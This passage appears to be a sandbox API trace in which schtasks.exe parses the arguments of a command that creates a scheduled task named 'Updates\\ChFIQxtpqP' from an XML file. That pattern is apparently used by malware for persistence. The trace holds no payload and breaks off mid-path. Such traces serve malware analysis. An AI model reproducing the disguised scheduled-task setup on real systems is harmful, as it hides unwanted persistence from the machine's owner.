[0183.345] lstrlenW (lpString="ru") returned 2 [0183.345] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] lstrlenW (lpString="TN") returned 2 [0183.346] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|ru|") returned 4 [0183.346] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.346] lstrlenW (lpString="|ru|") returned 4 [0183.346] lstrlenW (lpString="|TN|") returned 4 [0183.346] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0 [0183.346] SetLastError (dwErrCode=0x490) [0183.346] lstrlenW (lpString="rp") returned 2 [0183.346] lstrlenW (lpString="rp") returned 2 [0183.346] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] lstrlenW (lpString="TN") returned 2 [0183.346] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|rp|") returned 4 [0183.346] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.346] lstrlenW (lpString="|rp|") returned 4 [0183.346] lstrlenW (lpString="|TN|") returned 4 [0183.346] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0 [0183.346] SetLastError (dwErrCode=0x490) [0183.346] lstrlenW (lpString="sc") returned 2 [0183.346] lstrlenW (lpString="sc") returned 2 [0183.346] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] lstrlenW (lpString="TN") returned 2 [0183.346] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.346] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|sc|") returned 4 [0183.346] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.347] lstrlenW (lpString="|sc|") returned 4 [0183.347] lstrlenW (lpString="|TN|") returned 4 [0183.347] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0 [0183.347] SetLastError (dwErrCode=0x490) [0183.347] lstrlenW (lpString="mo") returned 2 [0183.347] lstrlenW (lpString="mo") returned 2 [0183.347] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.347] lstrlenW (lpString="TN") returned 2 [0183.347] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.347] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|mo|") returned 4 [0183.347] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.347] lstrlenW (lpString="|mo|") returned 4 [0183.347] lstrlenW (lpString="|TN|") returned 4 [0183.347] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0 [0183.347] SetLastError (dwErrCode=0x490) [0183.347] lstrlenW (lpString="d") returned 1 [0183.347] lstrlenW (lpString="d") returned 1 [0183.347] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.347] lstrlenW (lpString="TN") returned 2 [0183.347] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.347] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|d|") returned 3 [0183.347] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.347] lstrlenW (lpString="|d|") returned 3 [0183.347] lstrlenW (lpString="|TN|") returned 4 [0183.347] SetLastError (dwErrCode=0x490) [0183.348] lstrlenW (lpString="m") returned 1 [0183.348] lstrlenW (lpString="m") returned 1 [0183.348] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.348] lstrlenW (lpString="TN") returned 2 [0183.348] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.348] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|m|") returned 3 [0183.348] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.348] lstrlenW (lpString="|m|") returned 3 [0183.348] lstrlenW (lpString="|TN|") returned 4 [0183.348] SetLastError (dwErrCode=0x490) [0183.348] lstrlenW (lpString="i") returned 1 [0183.348] lstrlenW (lpString="i") returned 1 [0183.348] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.348] lstrlenW (lpString="TN") returned 2 [0183.348] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.348] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|i|") returned 3 [0183.348] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.348] lstrlenW (lpString="|i|") returned 3 [0183.348] lstrlenW (lpString="|TN|") returned 4 [0183.348] SetLastError (dwErrCode=0x490) [0183.348] lstrlenW (lpString="tn") returned 2 [0183.348] lstrlenW (lpString="tn") returned 2 [0183.348] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.348] lstrlenW (lpString="TN") returned 2 [0183.348] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.349] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|tn|") returned 4 [0183.349] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.349] lstrlenW (lpString="|tn|") returned 4 [0183.349] lstrlenW (lpString="|TN|") returned 4 [0183.349] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0183.349] SetLastError (dwErrCode=0x0) [0183.349] SetLastError (dwErrCode=0x0) [0183.349] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.349] lstrlenW (lpString="-/") returned 2 [0183.349] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0183.349] SetLastError (dwErrCode=0x490) [0183.349] SetLastError (dwErrCode=0x490) [0183.349] SetLastError (dwErrCode=0x0) [0183.349] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.349] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0183.349] SetLastError (dwErrCode=0x490) [0183.349] SetLastError (dwErrCode=0x0) [0183.349] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.349] SetLastError (dwErrCode=0x0) [0183.349] SetLastError (dwErrCode=0x0) [0183.349] lstrlenW (lpString="/XML") returned 4 [0183.349] lstrlenW (lpString="-/") returned 2 [0183.349] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.349] lstrlenW (lpString="create") returned 6 [0183.349] lstrlenW (lpString="create") returned 6 [0183.349] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.349] lstrlenW (lpString="XML") returned 3 [0183.349] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.350] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|create|") returned 8 [0183.350] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.350] lstrlenW (lpString="|create|") returned 8 [0183.350] lstrlenW (lpString="|XML|") returned 5 [0183.350] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0183.350] SetLastError (dwErrCode=0x490) [0183.350] lstrlenW (lpString="?") returned 1 [0183.350] lstrlenW (lpString="?") returned 1 [0183.350] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.350] lstrlenW (lpString="XML") returned 3 [0183.350] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.350] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|?|") returned 3 [0183.350] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.350] lstrlenW (lpString="|?|") returned 3 [0183.350] lstrlenW (lpString="|XML|") returned 5 [0183.350] SetLastError (dwErrCode=0x490) [0183.350] lstrlenW (lpString="s") returned 1 [0183.350] lstrlenW (lpString="s") returned 1 [0183.350] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.350] lstrlenW (lpString="XML") returned 3 [0183.350] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.350] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|s|") returned 3 [0183.350] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.350] lstrlenW (lpString="|s|") returned 3 [0183.350] lstrlenW (lpString="|XML|") returned 5 [0183.350] SetLastError (dwErrCode=0x490) [0183.351] lstrlenW (lpString="u") returned 1 [0183.351] lstrlenW (lpString="u") returned 1 [0183.351] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.351] lstrlenW (lpString="XML") returned 3 [0183.351] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.351] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|u|") returned 3 [0183.351] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.351] lstrlenW (lpString="|u|") returned 3 [0183.351] lstrlenW (lpString="|XML|") returned 5 [0183.351] SetLastError (dwErrCode=0x490) [0183.351] lstrlenW (lpString="p") returned 1 [0183.351] lstrlenW (lpString="p") returned 1 [0183.351] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.351] lstrlenW (lpString="XML") returned 3 [0183.351] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.351] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|p|") returned 3 [0183.351] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.351] lstrlenW (lpString="|p|") returned 3 [0183.351] lstrlenW (lpString="|XML|") returned 5 [0183.351] SetLastError (dwErrCode=0x490) [0183.351] lstrlenW (lpString="ru") returned 2 [0183.351] lstrlenW (lpString="ru") returned 2 [0183.351] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.351] lstrlenW (lpString="XML") returned 3 [0183.351] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.352] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|ru|") returned 4 [0183.352] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.352] lstrlenW (lpString="|ru|") returned 4 [0183.352] lstrlenW (lpString="|XML|") returned 5 [0183.352] SetLastError (dwErrCode=0x490) [0183.352] lstrlenW (lpString="rp") returned 2 [0183.352] lstrlenW (lpString="rp") returned 2 [0183.352] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.352] lstrlenW (lpString="XML") returned 3 [0183.352] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.352] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|rp|") returned 4 [0183.352] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.352] lstrlenW (lpString="|rp|") returned 4 [0183.352] lstrlenW (lpString="|XML|") returned 5 [0183.352] SetLastError (dwErrCode=0x490) [0183.352] lstrlenW (lpString="sc") returned 2 [0183.352] lstrlenW (lpString="sc") returned 2 [0183.352] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.352] lstrlenW (lpString="XML") returned 3 [0183.352] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.352] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|sc|") returned 4 [0183.352] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.352] lstrlenW (lpString="|sc|") returned 4 [0183.352] lstrlenW (lpString="|XML|") returned 5 [0183.353] SetLastError (dwErrCode=0x490) [0183.353] lstrlenW (lpString="mo") returned 2 [0183.353] lstrlenW (lpString="mo") returned 2 [0183.353] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.353] lstrlenW (lpString="XML") returned 3 [0183.353] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.353] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|mo|") returned 4 [0183.353] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.353] lstrlenW (lpString="|mo|") returned 4 [0183.353] lstrlenW (lpString="|XML|") returned 5 [0183.353] SetLastError (dwErrCode=0x490) [0183.353] lstrlenW (lpString="d") returned 1 [0183.353] lstrlenW (lpString="d") returned 1 [0183.353] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.353] lstrlenW (lpString="XML") returned 3 [0183.353] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.353] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|d|") returned 3 [0183.353] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.353] lstrlenW (lpString="|d|") returned 3 [0183.353] lstrlenW (lpString="|XML|") returned 5 [0183.353] SetLastError (dwErrCode=0x490) [0183.353] lstrlenW (lpString="m") returned 1 [0183.353] lstrlenW (lpString="m") returned 1 [0183.353] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.353] lstrlenW (lpString="XML") returned 3 [0183.353] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.354] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|m|") returned 3 [0183.354] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.354] lstrlenW (lpString="|m|") returned 3 [0183.354] lstrlenW (lpString="|XML|") returned 5 [0183.354] SetLastError (dwErrCode=0x490) [0183.354] lstrlenW (lpString="i") returned 1 [0183.354] lstrlenW (lpString="i") returned 1 [0183.354] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.354] lstrlenW (lpString="XML") returned 3 [0183.354] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.354] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|i|") returned 3 [0183.354] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.354] lstrlenW (lpString="|i|") returned 3 [0183.354] lstrlenW (lpString="|XML|") returned 5 [0183.354] SetLastError (dwErrCode=0x490) [0183.354] lstrlenW (lpString="tn") returned 2 [0183.354] lstrlenW (lpString="tn") returned 2 [0183.354] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.354] lstrlenW (lpString="XML") returned 3 [0183.354] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.354] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|tn|") returned 4 [0183.354] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.354] lstrlenW (lpString="|tn|") returned 4 [0183.354] lstrlenW (lpString="|XML|") returned 5 [0183.354] SetLastError (dwErrCode=0x490) [0183.354] lstrlenW (lpString="tr") returned 2 [0183.355] lstrlenW (lpString="tr") returned 2 [0183.355] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.355] lstrlenW (lpString="XML") returned 3 [0183.355] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.355] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|tr|") returned 4 [0183.355] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.355] lstrlenW (lpString="|tr|") returned 4 [0183.355] lstrlenW (lpString="|XML|") returned 5 [0183.355] SetLastError (dwErrCode=0x490) [0183.355] lstrlenW (lpString="st") returned 2 [0183.355] lstrlenW (lpString="st") returned 2 [0183.355] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.355] lstrlenW (lpString="XML") returned 3 [0183.355] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.355] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|st|") returned 4 [0183.355] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.355] lstrlenW (lpString="|st|") returned 4 [0183.355] lstrlenW (lpString="|XML|") returned 5 [0183.355] SetLastError (dwErrCode=0x490) [0183.355] lstrlenW (lpString="sd") returned 2 [0183.355] lstrlenW (lpString="sd") returned 2 [0183.355] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.355] lstrlenW (lpString="XML") returned 3 [0183.355] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.356] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|sd|") returned 4 [0183.356] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.356] lstrlenW (lpString="|sd|") returned 4 [0183.356] lstrlenW (lpString="|XML|") returned 5 [0183.356] SetLastError (dwErrCode=0x490) [0183.356] lstrlenW (lpString="ed") returned 2 [0183.356] lstrlenW (lpString="ed") returned 2 [0183.356] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.356] lstrlenW (lpString="XML") returned 3 [0183.356] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.356] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|ed|") returned 4 [0183.356] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.356] lstrlenW (lpString="|ed|") returned 4 [0183.356] lstrlenW (lpString="|XML|") returned 5 [0183.356] SetLastError (dwErrCode=0x490) [0183.356] lstrlenW (lpString="it") returned 2 [0183.356] lstrlenW (lpString="it") returned 2 [0183.356] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.356] lstrlenW (lpString="XML") returned 3 [0183.356] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.356] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|it|") returned 4 [0183.356] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.356] lstrlenW (lpString="|it|") returned 4 [0183.356] lstrlenW (lpString="|XML|") returned 5 [0183.357] SetLastError (dwErrCode=0x490) [0183.357] lstrlenW (lpString="et") returned 2 [0183.357] lstrlenW (lpString="et") returned 2 [0183.357] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.357] lstrlenW (lpString="XML") returned 3 [0183.357] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.357] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|et|") returned 4 [0183.357] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.357] lstrlenW (lpString="|et|") returned 4 [0183.357] lstrlenW (lpString="|XML|") returned 5 [0183.357] SetLastError (dwErrCode=0x490) [0183.357] lstrlenW (lpString="k") returned 1 [0183.357] lstrlenW (lpString="k") returned 1 [0183.357] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.357] lstrlenW (lpString="XML") returned 3 [0183.357] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.357] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|k|") returned 3 [0183.357] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.357] lstrlenW (lpString="|k|") returned 3 [0183.357] lstrlenW (lpString="|XML|") returned 5 [0183.357] SetLastError (dwErrCode=0x490) [0183.357] lstrlenW (lpString="du") returned 2 [0183.357] lstrlenW (lpString="du") returned 2 [0183.357] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.357] lstrlenW (lpString="XML") returned 3 [0183.357] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.358] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|du|") returned 4 [0183.358] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.358] lstrlenW (lpString="|du|") returned 4 [0183.358] lstrlenW (lpString="|XML|") returned 5 [0183.358] SetLastError (dwErrCode=0x490) [0183.358] lstrlenW (lpString="ri") returned 2 [0183.358] lstrlenW (lpString="ri") returned 2 [0183.358] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.358] lstrlenW (lpString="XML") returned 3 [0183.358] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.358] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|ri|") returned 4 [0183.358] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.358] lstrlenW (lpString="|ri|") returned 4 [0183.358] lstrlenW (lpString="|XML|") returned 5 [0183.358] SetLastError (dwErrCode=0x490) [0183.358] lstrlenW (lpString="z") returned 1 [0183.358] lstrlenW (lpString="z") returned 1 [0183.358] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.358] lstrlenW (lpString="XML") returned 3 [0183.358] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.358] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|z|") returned 3 [0183.358] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.358] lstrlenW (lpString="|z|") returned 3 [0183.358] lstrlenW (lpString="|XML|") returned 5 [0183.358] SetLastError (dwErrCode=0x490) [0183.358] lstrlenW (lpString="f") returned 1 [0183.359] lstrlenW (lpString="f") returned 1 [0183.359] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] lstrlenW (lpString="XML") returned 3 [0183.359] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|f|") returned 3 [0183.359] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.359] lstrlenW (lpString="|f|") returned 3 [0183.359] lstrlenW (lpString="|XML|") returned 5 [0183.359] SetLastError (dwErrCode=0x490) [0183.359] lstrlenW (lpString="v1") returned 2 [0183.359] lstrlenW (lpString="v1") returned 2 [0183.359] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] lstrlenW (lpString="XML") returned 3 [0183.359] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|v1|") returned 4 [0183.359] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.359] lstrlenW (lpString="|v1|") returned 4 [0183.359] lstrlenW (lpString="|XML|") returned 5 [0183.359] SetLastError (dwErrCode=0x490) [0183.359] lstrlenW (lpString="xml") returned 3 [0183.359] lstrlenW (lpString="xml") returned 3 [0183.359] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] lstrlenW (lpString="XML") returned 3 [0183.359] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.359] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|xml|") returned 5 [0183.360] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|XML|") returned 5 [0183.360] lstrlenW (lpString="|xml|") returned 5 [0183.360] lstrlenW (lpString="|XML|") returned 5 [0183.360] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|" [0183.360] SetLastError (dwErrCode=0x0) [0183.360] SetLastError (dwErrCode=0x0) [0183.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 